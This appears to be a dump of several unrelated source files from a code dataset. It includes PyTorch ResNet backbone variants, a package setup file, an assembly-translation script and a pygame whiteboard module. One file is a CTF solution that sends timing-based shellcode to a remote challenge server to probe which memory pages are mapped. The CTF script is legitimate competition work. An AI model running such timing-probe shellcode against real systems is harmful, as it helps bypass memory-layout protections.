self.bn1 = nn.BatchNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x = self.bn1(x)
# x = self.relu(x) # add missed relu
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------Comb resnet-----------------------------------
class Comb_ResNet(nn.Module):
def __init__(self, last_stride=2, block=Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.in1 = nn.InstanceNorm2d(64)
self.bn1_1 = nn.BatchNorm2d(64)
self.conv2 = nn.Sequential(
nn.Conv2d(128, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=1)
)
self.in2 = nn.InstanceNorm2d(256)
self.bn2_1 = nn.BatchNorm2d(256)
self.conv3 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(),
nn.Conv2d(256, 256, kernel_size=1)
)
self.in3 = nn.InstanceNorm2d(512)
self.bn3_1 = nn.BatchNorm2d(512)
self.conv4 = nn.Sequential(
nn.Conv2d(1024, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(),
nn.Conv2d(512, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(),
nn.Conv2d(512, 512, kernel_size=1)
)
self.in4 = nn.InstanceNorm2d(1024)
self.bn4_1 = nn.BatchNorm2d(1024)
self.conv5 = nn.Sequential(
nn.Conv2d(2048, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(),
nn.Conv2d(1024, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(),
nn.Conv2d(1024, 1024, kernel_size=1)
)
self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x = self.bn1(x)
# x = self.relu(x) # add missed relu
x = self.maxpool(x)
xin = self.in1(x)
xin = self.bn1_1(xin)
xin = self.relu(xin)
x = self.conv2(torch.cat((xin,x),1))
x = self.layer1(x)
xin = self.in2(x)
xin = self.bn2_1(xin)
xin = self.relu(xin)
x = self.conv3(torch.cat((xin,x),1))
x = self.layer2(x)
xin = self.in3(x)
xin = self.bn3_1(xin)
xin = self.relu(xin)
x = self.conv4(torch.cat((xin,x),1))
x = self.layer3(x)
xin = self.in4(x)
xin = self.bn4_1(xin)
xin = self.relu(xin)
x = self.conv5(torch.cat((xin,x),1))
x = self.layer4(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------Pure resnet-----------------------------------
class Pure_ResNet(nn.Module):
def __init__(self, last_stride=2, block=Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x = self.bn1(x)
#print(camid)
# x = self.relu(x) # add missed relu
x = self.maxpool(x)
if False:
x,_,_,_,_ = self.layer1(x)
x,_,_,_,_ = self.layer2(x)
x,_,_,_,_ = self.layer3(x)
x,_,_,_,_ = self.layer4(x)
else:
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------jointin resnet-----------------------------------
class Jointin_ResNet(nn.Module):
def __init__(self, last_stride=2, block=SNR3_Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.conv1_1 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.bn1_1 = nn.BatchNorm2d(64)
self.in1 = nn.InstanceNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x0 = self.in1(x)
'''
res0 = x - x0
res0 = self.conv1_1(res0)
res0 = self.bn1_1(res0)
x0 = x0 + res0
'''
x0 = self.bn1(x0)
# x = self.relu(x) # add missed relu
x0 = self.maxpool(x0)
x1_3, x1_2, x1_1, res1_2, res1_1 = self.layer1(x0)
x2_3, x2_2, x2_1, res2_2, res2_1 = self.layer2(x1_3)
x3_3, x3_2, x3_1, res3_2, res3_1 = self.layer3(x2_3)
x4_3, x4_2, x4_1, res4_2, res4_1 = self.layer4(x3_3)
if self.training:
return x4_3, x4_2, x4_1, res4_2, res4_1, x3_3, x3_2, x3_1, res3_2, res3_1, x2_3, x2_2, x2_1, res2_2, res2_1, x1_3, x1_2, x1_1, res1_2, res1_1
else:
return x4_3
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------jointout resnet-----------------------------------
class Jointout_ResNet(nn.Module):
def __init__(self, last_stride=2, block=SNR3_Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.conv1_res = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(inplace = True),
nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(inplace = True),
nn.Conv2d(64, 64, kernel_size=1)
)
self.in1 = nn.InstanceNorm2d(64)
self.bn1 = nn.BatchNorm2d(64)
self.bn1_1 = nn.BatchNorm2d(64)
self.in2 = nn.InstanceNorm2d(256)
self.bn2_1 = nn.BatchNorm2d(256)
self.bn2_0 = nn.BatchNorm2d(256)
self.in3 = nn.InstanceNorm2d(512)
self.bn3_1 = nn.BatchNorm2d(512)
self.bn3_0 = nn.BatchNorm2d(512)
self.in4 = nn.InstanceNorm2d(1024)
self.bn4_1 = nn.BatchNorm2d(1024)
self.bn4_0 = nn.BatchNorm2d(1024)
self.in5 = nn.InstanceNorm2d(2048)
self.bn5_1 = nn.BatchNorm2d(2048)
self.bn5_0 = nn.BatchNorm2d(2048)
self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.conv2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv2_res = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.ReLU(inplace = True),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.ReLU(inplace = True),
nn.Conv2d(128, 256, kernel_size=1)
)
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.conv3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv3_res = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(inplace = True),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(inplace = True),
nn.Conv2d(256, 512, kernel_size=1)
)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.conv4 = nn.Conv2d(1024, 1024, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv4_res = nn.Sequential(
nn.Conv2d(1024, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(inplace = True),
nn.Conv2d(512, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(inplace = True),
nn.Conv2d(512, 1024, kernel_size=1)
)
self.layer4 = self._make_layer(block, 512, layers[3], stride=last_stride)
self.conv5 = nn.Conv2d(2048, 2048, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv5_res = nn.Sequential(
nn.Conv2d(2048, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(inplace = True),
nn.Conv2d(1024, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(inplace = True),
nn.Conv2d(1024, 2048, kernel_size=1)
)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x0 = self.in1(x)
res0 = x - x0
x0 = self.bn1(x0)
x0 = self.relu(x0)
res0 = self.conv1_res(res0)
x0 = x0 + res0
x0 = self.bn1_1(x0)
# x = self.relu(x) # add missed relu
x0 = self.maxpool(x0)
x1 = self.layer1(x0)
px1 = self.conv2(x1)
x1 = self.in2(px1)
res1 = px1 - x1
x1 = self.bn2_0(x1)
x1 = self.relu(x1)
res1 = self.conv2_res(res1)
x1 = x1 + res1
x1 = self.bn2_1(x1)
x1 = self.relu(x1)
x2 = self.layer2(x1)
px2 = self.conv3(x2)
x2 = self.in3(px2)
res2 = px2 - x2
x2 = self.bn3_0(x2)
x2 = self.relu(x2)
res2 = self.conv3_res(res2)
x2 = x2 + res2
x2 = self.bn3_1(x2)
x2 = self.relu(x2)
x3 = self.layer3(x2)
px3 = self.conv4(x3)
x3 = self.in4(px3)
res3 = px3 - x3
x3 = self.bn4_0(x3)
x3 = self.relu(x3)
res3 = self.conv4_res(res3)
x3 = x3 + res3
x3 = self.bn4_1(x3)
x3 = self.relu(x3)
x4 = self.layer4(x3)
px4 = self.conv5(x4)
x4 = self.in5(px4)
res4 = px4 - x4
x4 = self.bn5_0(x4)
x4 = self.relu(x4)
res4 = self.conv5_res(res4)
x4 = x4 + res4
x4 = self.bn5_1(x4)
x4 = self.relu(x4)
if self.training:
return x0, x1, x2, x3, x4, res0, res1, res2, res3, res4
else:
return x4
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
|
Python
| 1,100
| 34.375454
| 153
|
/model/backbones/resnet.py
| 0.533126
| 0.481754
|
ariksu/pyhfss_parser
|
refs/heads/master
|
from setuptools import setup
setup(
name='pyhfss_parser',
version='0.0.0',
packages=['', 'venv.Lib.site-packages.py', 'venv.Lib.site-packages.py._io', 'venv.Lib.site-packages.py._log',
'venv.Lib.site-packages.py._code', 'venv.Lib.site-packages.py._path',
'venv.Lib.site-packages.py._process', 'venv.Lib.site-packages.py._vendored_packages',
'venv.Lib.site-packages.pip', 'venv.Lib.site-packages.pip._vendor',
'venv.Lib.site-packages.pip._vendor.idna', 'venv.Lib.site-packages.pip._vendor.pytoml',
'venv.Lib.site-packages.pip._vendor.certifi', 'venv.Lib.site-packages.pip._vendor.chardet',
'venv.Lib.site-packages.pip._vendor.chardet.cli', 'venv.Lib.site-packages.pip._vendor.distlib',
'venv.Lib.site-packages.pip._vendor.distlib._backport', 'venv.Lib.site-packages.pip._vendor.msgpack',
'venv.Lib.site-packages.pip._vendor.urllib3', 'venv.Lib.site-packages.pip._vendor.urllib3.util',
'venv.Lib.site-packages.pip._vendor.urllib3.contrib',
'venv.Lib.site-packages.pip._vendor.urllib3.contrib._securetransport',
'venv.Lib.site-packages.pip._vendor.urllib3.packages',
'venv.Lib.site-packages.pip._vendor.urllib3.packages.backports',
'venv.Lib.site-packages.pip._vendor.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip._vendor.colorama', 'venv.Lib.site-packages.pip._vendor.html5lib',
'venv.Lib.site-packages.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip._vendor.html5lib.treebuilders', 'venv.Lib.site-packages.pip._vendor.lockfile',
'venv.Lib.site-packages.pip._vendor.progress', 'venv.Lib.site-packages.pip._vendor.requests',
'venv.Lib.site-packages.pip._vendor.packaging', 'venv.Lib.site-packages.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip._vendor.webencodings', 'venv.Lib.site-packages.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip._internal', 'venv.Lib.site-packages.pip._internal.req',
'venv.Lib.site-packages.pip._internal.vcs', 'venv.Lib.site-packages.pip._internal.utils',
'venv.Lib.site-packages.pip._internal.models', 'venv.Lib.site-packages.pip._internal.commands',
'venv.Lib.site-packages.pip._internal.operations', 'venv.Lib.site-packages.attr',
'venv.Lib.site-packages.pluggy', 'venv.Lib.site-packages._pytest', 'venv.Lib.site-packages._pytest.mark',
'venv.Lib.site-packages._pytest._code', 'venv.Lib.site-packages._pytest.config',
'venv.Lib.site-packages._pytest.assertion', 'venv.Lib.site-packages.colorama',
'venv.Lib.site-packages.atomicwrites', 'venv.Lib.site-packages.parsimonious',
'venv.Lib.site-packages.parsimonious.tests', 'venv.Lib.site-packages.more_itertools',
'venv.Lib.site-packages.more_itertools.tests', 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.req',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.vcs',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.utils',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.compat',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.models',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib._backport',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.colorama',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treebuilders',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.lockfile',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.progress',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.chardet',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.util',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.contrib',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.packaging',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.webencodings',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.commands',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.operations'],
url='',
license='MIT',
author='Ariksu',
author_email='[email protected]',
description='Attempt to write peg-parser for .hfss'
)
|
Python
| 77
| 79.987015
| 125
|
/setup.py
| 0.639994
| 0.609205
|
kswgit/ctfs
|
refs/heads/master
|
from pwn import *
import time
context.update(arch='x86', bits=64)
iteration = 0x1000
cache_cycle = 0x10000000
shellcode = asm('''
_start:
mov rdi, 0x200000000
mov rsi, 0x300000000
mov rbp, 0
loop_start:
rdtsc
shl rdx, 32
or rax, rdx
push rax
mov rax, rdi
mov rdx, %d
a:
mov rcx, 0x1000
a2:
prefetcht1 [rax+rcx]
loop a2
dec edx
cmp edx, 0
ja a
b:
rdtsc
shl rdx, 32
or rax, rdx
pop rbx
sub rax, rbx
cmp rax, %d
jb exists
mov byte ptr [rsi], 1
jmp next
exists:
mov byte ptr [rsi], 0
next:
inc rsi
inc rbp
add rdi, 0x2000
cmp rbp, 64
jne loop_start
end:
int3
''' % (iteration, cache_cycle))
HOST, PORT = '0.0.0.0', 31337
HOST, PORT = '202.120.7.198', 13579
r = remote(HOST, PORT)
p = time.time()
r.send(p32(len(shellcode)) + shellcode)
print r.recvall()
print time.time() - p
|
Python
| 56
| 12.803572
| 39
|
/0ctf2017/pages.py
| 0.68863
| 0.577519
|
esdb/plinear
|
refs/heads/master
|
assembly = '''
7328- 400560: c5 f9 6e c7 vmovd %edi,%xmm0
7378- 400564: c4 e2 7d 58 c0 vpbroadcastd %xmm0,%ymm0
7435- 400569: c5 fd 76 0e vpcmpeqd (%rsi),%ymm0,%ymm1
7495- 40056d: c5 fd 76 56 20 vpcmpeqd 0x20(%rsi),%ymm0,%ymm2
7559- 400572: c5 fd 76 5e 40 vpcmpeqd 0x40(%rsi),%ymm0,%ymm3
7623- 400577: c5 fd 76 86 80 00 00 vpcmpeqd 0x80(%rsi),%ymm0,%ymm0
7687- 40057e: 00
7701- 40057f: c5 f5 6b ca vpackssdw %ymm2,%ymm1,%ymm1
7761- 400583: c5 e5 6b c0 vpackssdw %ymm0,%ymm3,%ymm0
7821- 400587: c5 f5 63 c0 vpacksswb %ymm0,%ymm1,%ymm0
7881- 40058b: c5 fd d7 c0 vpmovmskb %ymm0,%eax
7934- 40058f: c5 f8 77 vzeroupper
'''
print(assembly)
lines = assembly.strip().splitlines()
i = 0
while True:
if i >= len(lines):
break
line = lines[i]
i += 1
line = line[line.find(':') + 3:]
byte1 = line[:2] if len(line) >= 2 else ' '
byte2 = line[3:5] if len(line) >= 5 else ' '
byte3 = line[6:8] if len(line) >= 8 else ' '
byte4 = line[9:11] if len(line) >= 11 else ' '
byte5 = line[12:14] if len(line) >= 14 else ' '
byte6 = line[15:17] if len(line) >= 17 else ' '
byte7 = line[18:20] if len(line) >= 20 else ' '
if byte6 != ' ':
comment = line[24:]
line = lines[i]
i += 1
line = line[line.find(':') + 3:]
byte8 = line[:2] if len(line) >= 2 else ' '
print(' QUAD $0x%s%s%s%s%s%s%s%s // %s' % (byte8, byte7, byte6, byte5, byte4, byte3, byte2, byte1, comment))
elif byte5 != ' ':
print(' LONG $0x%s%s%s%s; BYTE $0x%s // %s' % (byte4, byte3, byte2, byte1, byte5, line[24:]))
elif byte4 != ' ':
print(' LONG $0x%s%s%s%s // %s' % (byte4, byte3, byte2, byte1, line[24:]))
elif byte3 != ' ':
print(' WORD $0x%s%s; BYTE $0x%s // %s' % (byte2, byte1, byte3, line[24:]))
|
Python
| 44
| 43.386364
| 119
|
/c/translate.py
| 0.524322
| 0.376856
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
"""
Module contenant toutes les figures et opérations de base
"""
import pygame
import pygame.draw
from datetime import datetime
def distance(v1, v2):
"""
Calcule la distance euclidienne entre deux vecteurs
"""
try:
return ((v1[0] - v2[0]) ** 2 + (v1[1] - v2[1]) ** 2) ** 0.5
except TypeError:
return "Ce ne sont pas des vecteurs"
class Figure:
def __init__(self):
pass
def draw(self):
pass
def fetch_params(self):
pass
class Point(Figure):
"""
Classe d'un point prêt à être tracé sur le tableau
coord (list) : coordonées
point_color (list) : couleur en RGB
font_size (int) : epaisseur en pixels
toolbar_size (int) : epaisseur de la toolbar en haut du tableau sur laquelle on ne veut pas que le point depasse
"""
def __init__(self, coord, point_color, font_size, toolbar_size=0):
Figure.__init__(self)
self.point_color = point_color
self.font_size = font_size
# used to not write on the toolbar if the font size is big
self.coord = [coord[0], max(coord[1], toolbar_size + font_size + 1)]
self.type = "Point"
def draw(self, screen):
"""
Dessine le point sur l'ecran
"""
pygame.draw.circle(screen, self.point_color, self.coord, self.font_size)
pygame.display.flip()
return
def fetch_params(self):
"""
Retourne un dictionnaire des parametres
"""
return {"coord": self.coord, "point_color": self.point_color, "font_size": self.font_size}
class Line(Figure):
"""
Classe d'une ligne droite
line_color (list) : couleur de la ligne en RGB
start_pos (list): coordonee du debut de la ligne droite
end_pos (list) : coordonee de la fin de la ligne droite
font_size (int): epaisseur
"""
def __init__(self, line_color, start_pos, end_pos, font_size):
Figure.__init__(self)
self.line_color = line_color
self.start_pos = start_pos
self.end_pos = end_pos
self.font_size = font_size
self.type = "Line"
def draw(self, screen):
"""
Dessine la ligne sur l'ecran
"""
pygame.draw.line(screen, self.line_color, self.start_pos, self.end_pos, self.font_size)
return
def fetch_params(self):
"""
Retourne un dictionnaire des parametres
"""
return {"line_color": self.line_color, "start_pos": self.start_pos, "end_pos": self.end_pos,
"font_size": self.font_size}
class Rectangle(Figure):
"""
Classe d un rectangle
color (list) : couleur du rectangle
left, right (int) : coordonees d'absice a gauche, droite du rectangle
bottom, top (int) : coordonees d'ordonnee en haut et en bas du rectangle
"""
def __init__(self, c1, c2, color):
"""
On definit les parametres du rectangle a partir des coordonees de deux coins
c1, c2 (lists): coordonees de deux coins du rectangle
"""
Figure.__init__(self)
self.c1 = c1
self.c2 = c2
self.color = color
# on recupere left avec le min des abscisses et on fait pareil pour right top et bottom
self.left = min(c1[0], c2[0])
self.top = min(c1[1], c2[1])
self.right = max(c1[0], c2[0])
self.bottom = max(c1[1], c2[1])
self.width = self.right - self.left
self.length = self.bottom - self.top
self.rect = pygame.Rect(self.left, self.top, self.width, self.length)
self.type = "rect"
def draw(self, screen):
"""
Dessine le rectangle sur l'ecran
"""
pygame.draw.rect(screen, self.color, self.rect, 0)
def fetch_params(self):
"""
Retourne un dictionnaire des parametres
"""
return {"c1": self.c1, "c2": self.c2, "color": self.color}
class Circle(Figure):
"""
Classe d un cercle
center (list) : les coordonees du centre
extremity (list) : les coordonees d'une extremite
color (list) : couleur
